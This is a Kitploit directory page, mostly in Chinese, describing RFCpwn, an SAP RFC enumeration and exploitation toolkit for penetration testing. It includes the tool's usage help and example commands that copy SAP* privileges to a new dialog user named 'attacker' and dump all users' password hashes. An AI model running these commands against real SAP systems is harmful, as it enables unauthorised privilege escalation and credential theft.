Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
RFCpwn — 一个使用RFC调用SAP的枚举与利用工具包 | Kitploit
工具/GitHubGitHub/icryo/rfcpwn
密码破解漏洞分析漏洞利用信息收集渗透测试
GitHubicryo/rfcpwn

RFCpwn

一个使用RFC调用SAP的枚举与利用工具包

查看仓库
401146年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

RFCpwn

一个使用 SAP RFC 调用的 SAP 枚举与利用工具包

Twitter: @icryo

这是一个用于展示受损服务账户影响的工具包。

此 PoC 不适用于生产环境,不保证稳定性或支持。

RFCpwn 依赖于 pyrfc 以及 SAP 提供的库,详情请参见:https://github.com/SAP/PyRFC#installation

root@kitploit:~
usage: RFCpwn.py [-h] [-debug] [-ip IP] [-u Username] [-p Password]
                   [-c Client] [-s Sysid] [-ping] [-enum] [-usercopy]
                   [-user USER] [-copy COPY] [-pw PW] [-dump] [-exp]

An Impacket style enumeration and exploitation tool using SAP RFC calls

optional arguments:
  -h, --help   show this help message and exit
  -debug       Turn DEBUG output ON

Authentication:
  -ip IP       <targetName or address>
  -u Username  RFC Users Username
  -p Password  RFC Users Password
  -c Client    Client- eg.000
  -s Sysid     System Number- eg 00
  -ping        RFC Ping Command

User Abuse:
  -enum        Use to enumerate a specific user
  -usercopy    add a Dialog User
  -user USER   Required for -usercopy and -userenum to specify the user
  -copy COPY   User to be copied required for -usercopy
  -pw PW       password of new user for -usercopy

Hash Collection:
  -dump        Dump hashes use with below
  -exp         EXPERIMENTAL - Dump BCODE / PASSCODE hashes

示例

Ping - 确认连接

root@kitploit:~
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -ping

将用户权限复制到一个新的对话用户。如果未指定 -copy,则默认使用 SAP*。

root@kitploit:~
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -usercopy -user attacker -pw changeme1

从所有用户转储哈希。使用 -exp 选项可获取实验性的 bcode 和 passcode 哈希。

root@kitploit:~
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -dump 

演示

Imgur Image

下载工具